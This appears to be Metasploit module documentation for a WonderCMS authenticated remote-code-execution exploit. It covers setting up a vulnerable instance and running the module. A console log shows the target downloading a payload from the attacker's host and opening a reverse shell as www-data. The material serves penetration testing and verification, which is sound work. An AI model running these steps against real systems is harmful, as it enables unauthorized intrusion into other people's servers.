## Vulnerable Application

[WonderCMS](https://www.wondercms.com/) is a free and open-source Content Management System (CMS). The main advantage is that only one PHP file controls the whole management. Follow next steps to install application:

### Source Installation
1. Install Apache2 and PHP on server
2. Download WonderCMS from [here](https://github.com/WonderCMS/wondercms/releases/download/3.4.2/wondercms-342.zip)
3. Enable Apache2 Rewrite Engine: `sudo a2enmod rewrite`
### Docker Installation
1. Clone the following repo: `git clone https://github.com/mablanco/docker-wondercms.git`
2. Inside the `Dockerfile` set the version to a vulnerable version: `ARG WONDERCMS_VERSION=3.4.0`
3. Build the image: ` docker build -t 3.4.0 .`
4. Run the container: `docker run -d -p 8980:80 --name wondercms 3.4.0`


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use multi/http/wondercms_rce`
4. Do: `set PASSWORD [password]`
5. Do: `set RHOST [WonderCMS IP]
6. Do: `set SRVHOST [attacker IP to host payload]`
7. Do: `set LHOST [attacker IP]`
8. Do: `set LPORT [attacker PORT]`
9. Do: `run`
10. You should get a shell.

## Options

### PASSWORD

WonderCMS uses a global password that generated at the application's first run. This is global admin password that controls the whole CMS. This password has to be used in the exploit to get authenticated access.

## Scenarios

```
msf6 exploit(multi/http/wondercms_rce) > set LHOST 192.168.168.152
LHOST => 192.168.168.152
msf6 exploit(multi/http/wondercms_rce) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/http/wondercms_rce) > exploit
[*] Exploit running as background job 28.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wondercms_rce) > 
[*] Started reverse TCP handler on 192.168.168.152:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is probably WonderCMS..
[+] The target is vulnerable. Version 3.4.2 is affected
[*] Using URL: http://192.168.168.152:8082/81k4.zip
[*] Received request, sending payload..
[*] Server stopped.
[*] Command shell session 5 opened (192.168.168.152:4444 -> 192.168.168.146:37068) at 2025-04-25 14:46:20 +0200

msf6 exploit(multi/http/wondercms_rce) > sessions 5
[*] Starting interaction with 5...

whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

